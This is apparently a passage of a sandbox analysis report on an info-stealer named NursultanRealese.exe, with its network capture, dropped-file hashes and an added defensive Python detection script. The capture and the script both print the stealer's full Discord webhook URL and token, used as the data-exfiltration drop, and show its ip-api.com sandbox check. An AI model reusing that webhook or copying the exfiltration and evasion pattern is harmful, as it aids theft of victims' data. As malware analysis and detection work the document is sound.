                                Set-Cookie: __sdcfduid=ec75da78add311efb31326ed731c1150b96222c1f7d8da739f212460751b8c372a3c6103d328a82d186ada49712b8ef4; Expires=Tue, 27-Nov-2029 21:58:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                Set-Cookie: __cfruid=0bdb9b21f8b7f597670acf41fe0da38099d8bd58-1732831118; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                Set-Cookie: _cfuvid=5R8j4HueGWWMOGNWj1qZKSm3XweFg8OD2l5n3U.08YE-1732831118908-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                Server: cloudflare
                                CF-RAY: 8e9d9ed37b416367-LHR
                              • flag-us
                                POST
                                https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G
                                NursultanRealese.exe
                                Remote address:
                                162.159.136.232:443
                                Request
                                POST /api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G HTTP/1.1
                                Accept: application/json
                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                Content-Type: multipart/form-data; boundary="922da92f-c09f-40c1-8a8e-aec394bb04e4"
                                Host: discord.com
                                Cookie: __dcfduid=ec75da78add311efb31326ed731c1150; __sdcfduid=ec75da78add311efb31326ed731c1150b96222c1f7d8da739f212460751b8c372a3c6103d328a82d186ada49712b8ef4; __cfruid=0bdb9b21f8b7f597670acf41fe0da38099d8bd58-1732831118; _cfuvid=5R8j4HueGWWMOGNWj1qZKSm3XweFg8OD2l5n3U.08YE-1732831118908-0.0.1.1-604800000
                                Content-Length: 39957
                                Expect: 100-continue
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:39 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                x-ratelimit-limit: 5
                                x-ratelimit-remaining: 4
                                x-ratelimit-reset: 1732831120
                                x-ratelimit-reset-after: 1
                                vary: Accept-Encoding
                                via: 1.1 google
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3a1w621I9ezJjNdcdd3cGTdtaj7xbOorNwQhbb41k08KREPDmMEgky8%2B%2Fu6KvPZ4u5iqhAW5D6L1az6UeRu%2FP2SLyZ%2FGDPcrRj2ciyfEWfiRN1eMinDVTHFdnNzh"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                X-Content-Type-Options: nosniff
                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                Server: cloudflare
                                CF-RAY: 8e9d9edd88706367-LHR
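The two POSTs above are the exfiltration leg of the sample: a 941-byte JSON body (the webhook embed) answered with 204, then a 39957-byte multipart/form-data body (the collected files) answered with 200, both sent with an Opera 12/Presto User-Agent claiming Windows NT 6.1 from a .NET binary running on Windows 10. Together with the ip-api.com requests further down (`fields=hosting`, which asks whether the egress IP belongs to a hosting range, and `fields=225545`), this is enough to write detections. The following is an added example, not part of the sandbox report or of the Umbral project: it runs those detections over constructed log lines that reuse the URLs and User-Agents from this capture. The record format `<process> <METHOD> <url> | <User-Agent>`, the list of browser process names, and the ip-api.com bit-to-field map (taken from that service's public field documentation) are assumptions.

```python
"""Triage of the HTTP records shown above for Umbral-style exfiltration.

Added example (not part of the sandbox report). It runs three detections
over constructed log lines that reproduce the requests in this capture:
  1. POST to a Discord webhook from a process that is not a browser
  2. ip-api.com lookup, with 'fields=hosting' flagged as a sandbox/VM check
  3. a non-browser process sending a browser User-Agent (here Opera/Presto)
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

UMBRAL_UA = "Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17"
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36")

# Constructed log, one record per line: "<process> <METHOD> <url> | <User-Agent>".
# URLs and User-Agents are copied from the capture above; the format itself is invented.
SAMPLE_LOG = f"""\
NursultanRealese.exe GET https://gstatic.com/generate_204 | {UMBRAL_UA}
NursultanRealese.exe GET http://ip-api.com/line/?fields=hosting | {UMBRAL_UA}
NursultanRealese.exe GET http://ip-api.com/json/?fields=225545 | {UMBRAL_UA}
NursultanRealese.exe POST https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G | {UMBRAL_UA}
chrome.exe GET https://clients2.google.com/service/update2/crx?os=win&arch=x64 | {CHROME_UA}
chrome.exe POST https://beacons.gcp.gvt2.com/domainreliability/upload | {CHROME_UA}
"""

LINE_RE = re.compile(r"^(?P<proc>\S+) (?P<method>[A-Z]+) (?P<url>\S+) \| (?P<ua>.+)$")
# Discord webhook path: numeric snowflake id, then a long url-safe token.
WEBHOOK_RE = re.compile(r"^/api/webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]{50,})$")

# Bit values for ip-api.com's numeric 'fields' parameter, taken from its public
# field documentation (assumption: re-check against the current docs).
IPAPI_FIELDS = {
    1: "country", 2: "countryCode", 4: "region", 8: "regionName", 16: "city",
    32: "zip", 64: "lat", 128: "lon", 256: "timezone", 512: "isp", 1024: "org",
    2048: "as", 4096: "reverse", 8192: "query", 16384: "status", 32768: "message",
    65536: "mobile", 131072: "proxy", 16777216: "hosting",
}

# Processes for which a browser User-Agent is expected (assumed list).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe"}


@dataclass(frozen=True)
class Finding:
    process: str
    rule: str
    ioc: str      # what to block, revoke or hunt for
    detail: str


def decode_ipapi_fields(value: str) -> list[str]:
    """Expand ip-api.com's 'fields=' value, numeric bitmask or comma list, into names."""
    if value.isdigit():
        mask = int(value)
        return [name for bit, name in sorted(IPAPI_FIELDS.items()) if mask & bit]
    return [v for v in value.split(",") if v]


def triage(log_text: str) -> list[Finding]:
    findings: list[Finding] = []
    ua_reported: set[str] = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the record format
        proc, method, url, ua = m["proc"], m["method"], m["url"], m["ua"]
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        is_browser = proc.lower() in BROWSERS

        # 1. Discord webhook as a drop: report the id for takedown, never log the token.
        wh = WEBHOOK_RE.match(parts.path) if host == "discord.com" else None
        if wh and method == "POST" and not is_browser:
            findings.append(Finding(proc, "discord_webhook_exfil", wh["id"],
                                    f"token_prefix={wh['token'][:6]}..."))

        # 2. External IP lookup; asking for 'hosting' is the VM/sandbox tell.
        if host == "ip-api.com":
            fields = decode_ipapi_fields(parse_qs(parts.query).get("fields", [""])[0])
            rule = "sandbox_check_hosting" if "hosting" in fields else "external_ip_lookup"
            findings.append(Finding(proc, rule, host, "fields=" + ",".join(fields)))

        # 3. A .NET stealer claiming to be Opera 12 (Presto engine) on Windows 6.1.
        if not is_browser and ua.startswith(("Mozilla/", "Opera/")) and proc not in ua_reported:
            ua_reported.add(proc)
            findings.append(Finding(proc, "browser_ua_from_non_browser", proc, ua))
    return findings


def webhook_ids(findings: list[Finding]) -> list[str]:
    """Webhook ids to report to Discord / add to the blocklist."""
    return sorted({f.ioc for f in findings if f.rule == "discord_webhook_exfil"})


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.process:22} {f.rule:28} {f.ioc:22} {f.detail}")
```

Run against the constructed log, only the stealer's four records produce findings; the chrome.exe update and domain-reliability requests stay silent. The webhook finding carries the snowflake id rather than the token so the alert itself does not become a second copy of the credential; the full URL is still in the proxy log if the webhook has to be reported to Discord for deletion.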
                              • flag-us
                                DNS
                                clients2.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                clients2.google.com
                                IN A
                                Response
                                clients2.google.com
                                IN CNAME
                                clients.l.google.com
                                clients.l.google.com
                                IN A
                                142.250.178.14
                              • flag-gb
                                GET
                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1
                                chrome.exe
                                Remote address:
                                142.250.178.14:443
                                Request
                                GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1 HTTP/2.0
                                host: clients2.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                                cookie: __Secure-ENID=22.SE=Bn1Uj9Rd24j5OYsGSYUYdQI5VDkfBnpifkUcXVUoyffQQrxVS6ssufRUCL_SrWR3YPWnl0YKOBfB3a0LzHgJhqjtbDA7GgIRtqQHk1I14ZiHmQsTPlnH4V5ShoilyC6G6R5C_dshhYDEAcct9nUAd44LZ2bVhz2Q9gJCS0Q7ZU_apZqYfwl7riRFFIhhgRvpFuE
                              • flag-us
                                DNS
                                232.136.159.162.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                232.136.159.162.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                14.178.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                14.178.250.142.in-addr.arpa
                                IN PTR
                                Response
                                14.178.250.142.in-addr.arpa
                                IN PTR
                                lhr48s27-in-f14.1e100.net
                              • flag-us
                                DNS
                                97.17.167.52.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                97.17.167.52.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                56.163.245.4.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                56.163.245.4.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                198.187.3.20.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                198.187.3.20.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                107.12.20.2.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                107.12.20.2.in-addr.arpa
                                IN PTR
                                Response
                                107.12.20.2.in-addr.arpa
                                IN PTR
                                a2-20-12-107.deploy.static.akamaitechnologies.com
                              • flag-us
                                DNS
                                chrome.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                chrome.google.com
                                IN A
                                Response
                                chrome.google.com
                                IN CNAME
                                www3.l.google.com
                                www3.l.google.com
                                IN A
                                142.250.200.14
                              • flag-us
                                DNS
                                chrome.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                chrome.google.com
                                IN A
                              • flag-us
                                DNS
                                14.200.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                14.200.250.142.in-addr.arpa
                                IN PTR
                                Response
                                14.200.250.142.in-addr.arpa
                                IN PTR
                                lhr48s29-in-f14.1e100.net
                              • flag-us
                                DNS
                                beacons.gcp.gvt2.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                beacons.gcp.gvt2.com
                                IN A
                                Response
                                beacons.gcp.gvt2.com
                                IN CNAME
                                beacons-handoff.gcp.gvt2.com
                                beacons-handoff.gcp.gvt2.com
                                IN A
                                172.217.16.227
                              • flag-gb
                                POST
                                https://beacons.gcp.gvt2.com/domainreliability/upload
                                chrome.exe
                                Remote address:
                                172.217.16.227:443
                                Request
                                POST /domainreliability/upload HTTP/2.0
                                host: beacons.gcp.gvt2.com
                                content-length: 996
                                content-type: application/json; charset=utf-8
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-us
                                DNS
                                227.16.217.172.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                227.16.217.172.in-addr.arpa
                                IN PTR
                                Response
                                227.16.217.172.in-addr.arpa
                                IN PTR
                                lhr48s28-in-f3.1e100.net
                                227.16.217.172.in-addr.arpa
                                IN PTR
                                mad08s04-in-f3.1e100.net
                              • 142.250.179.227:443
                                https://gstatic.com/generate_204
                                tls, http
                                NursultanRealese.exe
                                724 B
                                4.9kB
                                8
                                8

                                HTTP Request

                                GET https://gstatic.com/generate_204

                                HTTP Response

                                204
                              • 208.95.112.1:80
                                http://ip-api.com/line/?fields=hosting
                                http
                                NursultanRealese.exe
                                310 B
                                266 B
                                5
                                2

                                HTTP Request

                                GET http://ip-api.com/line/?fields=hosting

                                HTTP Response

                                200
                              • 172.217.16.228:443
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                tls, http2
                                chrome.exe
                                3.5kB
                                20.8kB
                                34
                                44

                                HTTP Request

                                GET https://www.google.com/async/ddljson?async=ntp:2

                                HTTP Request

                                GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                HTTP Request

                                GET https://www.google.com/async/newtab_promos

                                HTTP Request

                                GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIrPo7oGIjAlucUIA4wT3cFrxiYaY30ReocY9NWnDLwwQEZs229iU7U4lvc_DD_cRlDn-pF6kJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                HTTP Response

                                429

                                HTTP Request

                                GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIrPo7oGIjDdJWIccIdWYw-DIYE9e3-V9Pz-WYsczSaImjbBJHz_oyqkNBytSdytI8czfyKFVCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                HTTP Request

                                GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                              • 172.217.16.228:443
                                www.google.com
                                chrome.exe
                                98 B
                                52 B
                                2
                                1
                              • 172.217.16.228:443
                                www.google.com
                                chrome.exe
                                98 B
                                52 B
                                2
                                1
                              • 208.95.112.1:80
                                http://ip-api.com/json/?fields=225545
                                http
                                NursultanRealese.exe
                                285 B
                                472 B
                                5
                                3

                                HTTP Request

                                GET http://ip-api.com/json/?fields=225545

                                HTTP Response

                                200
                              • 162.159.136.232:443
                                https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G
                                tls, http
                                NursultanRealese.exe
                                44.2kB
                                8.1kB
                                43
                                30

                                HTTP Request

                                POST https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G

                                HTTP Response

                                204

                                HTTP Request

                                POST https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G

                                HTTP Response

                                200
                              • 142.250.178.14:443
                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1
                                tls, http2
                                chrome.exe
                                2.1kB
                                9.3kB
                                14
                                18

                                HTTP Request

                                GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1
                              • 142.250.200.14:443
                                chrome.google.com
                                tls, http2
                                chrome.exe
                                953 B
                                8.1kB
                                8
                                9
                              • 172.217.16.227:443
                                https://beacons.gcp.gvt2.com/domainreliability/upload
                                tls, http2
                                chrome.exe
                                2.7kB
                                6.6kB
                                14
                                15

                                HTTP Request

                                POST https://beacons.gcp.gvt2.com/domainreliability/upload
                              • 8.8.8.8:53
                                gstatic.com
                                dns
                                NursultanRealese.exe
                                57 B
                                73 B
                                1
                                1

                                DNS Request

                                gstatic.com

                                DNS Response

                                142.250.179.227

                              • 8.8.8.8:53
                                ip-api.com
                                dns
                                NursultanRealese.exe
                                56 B
                                72 B
                                1
                                1

                                DNS Request

                                ip-api.com

                                DNS Response

                                208.95.112.1

                              • 8.8.8.8:53
                                58.55.71.13.in-addr.arpa
                                dns
                                70 B
                                144 B
                                1
                                1

                                DNS Request

                                58.55.71.13.in-addr.arpa

                              • 8.8.8.8:53
                                227.179.250.142.in-addr.arpa
                                dns
                                74 B
                                112 B
                                1
                                1

                                DNS Request

                                227.179.250.142.in-addr.arpa

                              • 8.8.8.8:53
                                72.32.126.40.in-addr.arpa
                                dns
                                71 B
                                157 B
                                1
                                1

                                DNS Request

                                72.32.126.40.in-addr.arpa

                              • 8.8.8.8:53
                                95.221.229.192.in-addr.arpa
                                dns
                                73 B
                                144 B
                                1
                                1

                                DNS Request

                                95.221.229.192.in-addr.arpa

                              • 8.8.8.8:53
                                88.210.23.2.in-addr.arpa
                                dns
                                70 B
                                133 B
                                1
                                1

                                DNS Request

                                88.210.23.2.in-addr.arpa

                              • 8.8.8.8:53
                                1.112.95.208.in-addr.arpa
                                dns
                                71 B
                                95 B
                                1
                                1

                                DNS Request

                                1.112.95.208.in-addr.arpa

                              • 8.8.8.8:53
                                www.google.com
                                dns
                                chrome.exe
                                60 B
                                76 B
                                1
                                1

                                DNS Request

                                www.google.com

                                DNS Response

                                172.217.16.228

                              • 8.8.8.8:53
                                74.204.58.216.in-addr.arpa
                                dns
                                72 B
                                171 B
                                1
                                1

                                DNS Request

                                74.204.58.216.in-addr.arpa

                              • 8.8.8.8:53
                                35.200.250.142.in-addr.arpa
                                dns
                                73 B
                                111 B
                                1
                                1

                                DNS Request

                                35.200.250.142.in-addr.arpa

                              • 8.8.8.8:53
                                228.16.217.172.in-addr.arpa
                                dns
                                73 B
                                140 B
                                1
                                1

                                DNS Request

                                228.16.217.172.in-addr.arpa

                              • 172.217.16.228:443
                                www.google.com
                                https
                                chrome.exe
                                1.7kB
                                7.1kB
                                7
                                8
                              • 8.8.8.8:53
                                discord.com
                                dns
                                NursultanRealese.exe
                                57 B
                                137 B
                                1
                                1

                                DNS Request

                                discord.com

                                DNS Response

                                162.159.136.232
                                162.159.135.232
                                162.159.138.232
                                162.159.128.233
                                162.159.137.232

                              • 224.0.0.251:5353
                                chrome.exe
                                204 B
                                3
                              • 8.8.8.8:53
                                clients2.google.com
                                dns
                                chrome.exe
                                65 B
                                105 B
                                1
                                1

                                DNS Request

                                clients2.google.com

                                DNS Response

                                142.250.178.14

                              • 8.8.8.8:53
                                232.136.159.162.in-addr.arpa
                                dns
                                74 B
                                136 B
                                1
                                1

                                DNS Request

                                232.136.159.162.in-addr.arpa

                              • 8.8.8.8:53
                                14.178.250.142.in-addr.arpa
                                dns
                                73 B
                                112 B
                                1
                                1

                                DNS Request

                                14.178.250.142.in-addr.arpa

                              • 8.8.8.8:53
                                97.17.167.52.in-addr.arpa
                                dns
                                71 B
                                145 B
                                1
                                1

                                DNS Request

                                97.17.167.52.in-addr.arpa

                              • 8.8.8.8:53  56.163.245.4.in-addr.arpa  dns  sent 71 B, received 157 B, 1 request, 1 response
                                DNS Request: 56.163.245.4.in-addr.arpa

                              • 8.8.8.8:53  198.187.3.20.in-addr.arpa  dns  sent 71 B, received 157 B, 1 request, 1 response
                                DNS Request: 198.187.3.20.in-addr.arpa

                              • 8.8.8.8:53  107.12.20.2.in-addr.arpa  dns  sent 70 B, received 133 B, 1 request, 1 response
                                DNS Request: 107.12.20.2.in-addr.arpa

                              • 8.8.8.8:53  chrome.google.com  dns  chrome.exe  sent 126 B, received 100 B, 2 requests, 1 response
                                DNS Request: chrome.google.com
                                DNS Request: chrome.google.com
                                DNS Response: 142.250.200.14

                              • 8.8.8.8:53  14.200.250.142.in-addr.arpa  dns  sent 73 B, received 112 B, 1 request, 1 response
                                DNS Request: 14.200.250.142.in-addr.arpa

                              • 8.8.8.8:53  beacons.gcp.gvt2.com  dns  chrome.exe  sent 66 B, received 112 B, 1 request, 1 response
                                DNS Request: beacons.gcp.gvt2.com
                                DNS Response: 172.217.16.227

                              • 8.8.8.8:53  227.16.217.172.in-addr.arpa  dns  sent 73 B, received 140 B, 1 request, 1 response
                                DNS Request: 227.16.217.172.in-addr.arpa
                              MITRE ATT&CK Enterprise v15

                              Downloads

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                Filesize 649B
                                MD5      a2a317a88a20f6e67c006fc09156cf04
                                SHA1     de0a6e43157b26d2fdb65d9d77f97726cd9021a2
                                SHA256   e3f866de87489768b9dff3adc212b37e99327523185617cb0bc0b317bfc97c13
                                SHA512   eceb27e5b6212ed757efd7e9b4376237a2374d6f35e872c960578300c6108b51420119511f44ca48df4d2a1c6ab819b0e6fb86e9c38e184fe304f0c57ce10ef7

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                Filesize 1KB
                                MD5      accfed4fdbc139daf2c1687cb2e4b13d
                                SHA1     7d733ff062f561f26153389eba8f162d094fa8fb
                                SHA256   95e901de4962e719407287737c8bfaba2c912cc714c6bea47d2e386e2e52397c
                                SHA512   83aea03d1d464e46b0fa534a0292505804b3b44a87608931129d1fa35fe7cd1d1a9113a1b5f927755bda769ce6a6faffec34ae7f4d6aa8f8f2fac9fb04abf2d2

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                Filesize 356B
                                MD5      9fbad226e3670e6cc8c7c0b01b0da760
                                SHA1     22c1f2ab50d7a4f573b59dbd769368fcf3f2ba65
                                SHA256   524c91abae8bd2218788008902e71057ead97ebea65d232c5db84f6902478c21
                                SHA512   84a4a22850f67483cbe42d9941d788cdad537bbe20d20d8da019d295333983adf06911446be91a492c0b36f5d8b8362e0dc5c4f8f9314495628dba34b7789dfd

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\c9c711c2-5ac6-464b-86ef-847b1f4e607e.tmp
                                Filesize 2B (the MD5 and SHA256 below are those of the two-byte string "[]", an empty JSON array)
                                MD5      d751713988987e9331980363e24189ce
                                SHA1     97d170e1550eee4afc0af065b78cda302a97674c
                                SHA256   4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
                                SHA512   b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      0a55455979f0902586fadb9438726dea
                                SHA1     ab4993d430fcc4891380c5dc01cc0f6a3792e96b
                                SHA256   634b16130e0689c9058bc8825859f94ff1102b95fcfd3f93dbdcb18df2be25a3
                                SHA512   b97e2e652cb9a6b1089a8fd4ea883e86bf42534282369fb2ea1d0c1a94c4f22e132485f84f3c75bf150e2761e87c8d660600539939d9e4e0dcb583776e0529cf

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      f9d0b126926c8ddf2f781a948bb1c8bb
                                SHA1     2d961276c7db5fbec6b161c53f400f7b404fcc10
                                SHA256   22b1d1da8b217bd4adcc61f4e2d98e31908b815e7ac950ad0012df525e789e11
                                SHA512   dfc7b66a99e7f03e6717d4ef3fc72349cea499c5e7a32243703576f9250fec7c2d6dda99959d5d481c1004bde5401679e2829c86fa6aacb4a3977af4e172a416

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      ca2d5f9cf29ac8d982794ceebe68a7e9
                                SHA1     a1cc3dc59d7e2550045313b954d34a97aba57861
                                SHA256   02120e525ff772958bbe0c8680ec90bbca651046da54419acd09af31027fc7c2
                                SHA512   a27620eb5fdf49f3d4605b99f24ef5cab264f1fa59616761b49cc05478cf043b6c69e0ac7a360b3a269ce2b645519f6d3f00fc2b13e4ac8ea9b6c8812f99f5fe

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      8358ddf7528a8a6ea22dd12211a876fe
                                SHA1     c8a584b093cf74275bc97da409d18bca55c56393
                                SHA256   79b1dfa1fee98a20894afe17c250fda083f9f82211e8ff4d9ffa85be430a3fd7
                                SHA512   201b27952621b0d8542689f573a8d1e86d22fd2f3f9dbaa7a0610d3a6420a12d0487c03a45a5649fa31de9721711846ca347e2ece8ba2cec18f0ca5e1128fe44

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      0e09cd77d702dbdc67cfbed457baf9ac
                                SHA1     6e5dc3fae4a051e8a9dccde923e02facd276d61c
                                SHA256   6cc6516f03416d288ac1f527b49dca13e50fad559cac8c93ff4a94ceaf06d940
                                SHA512   12671a22dc4040180f365e1606e25c336d34ea6e86902dbcd5c5e76334d11282b6c750916a6a76ec5cad995314a956eaa9c3396dca2152f6ed1984a45717ccfc

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      f2cf6da16f9d407bfb708b3674802040
                                SHA1     5da67647cc042759b23923fba4954f321f510314
                                SHA256   e5a97b5e8ef20ffcfab12112f51a3e110169b6594af27e5bfd2b0d4a27fda0a8
                                SHA512   d8427d42a09bb6856697b3f62cf4fb3150bbc4d6abf13748431ad1e629302a3857847812232ecdb37d5029e10606ef061a1f134cc3f66f180e370fe951726c85

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize 9KB
                                MD5      cfdd06dafb1f3418493cfa6b8363b8f0
                                SHA1     cfd8dc3b1d9f6e3589a8fa900d02a64116137395
                                SHA256   421a645b711d02739527a1b3e86022863a1145bcc09798005fc4764d6ece724d
                                SHA512   edb96f3643c61d775dc0393c14b04656fc37ccdeef4aae51d9ef5c14f60b273562dcb8abcbc4a228c5f1dfbf20cf5cb606df76357d624227f1e5c18a58212a58

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                Filesize 15KB
                                MD5      bd11a2af1410c62f5627c79b259825c1
                                SHA1     5967b6907910932969859b5511b4873432e10f21
                                SHA256   f84891bd57e436e7147ec612e627bcca5d000e0870d2d728e7729139294aae95
                                SHA512   596c21907e20977bdfd6da42367dae50f42cd9c59bf76aa07fff50ed9d8d2fdff9521a8ba97468ffce86d54bb00300ed02731def549d4a2774f0f0d0c7240b6d

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                Filesize 234KB
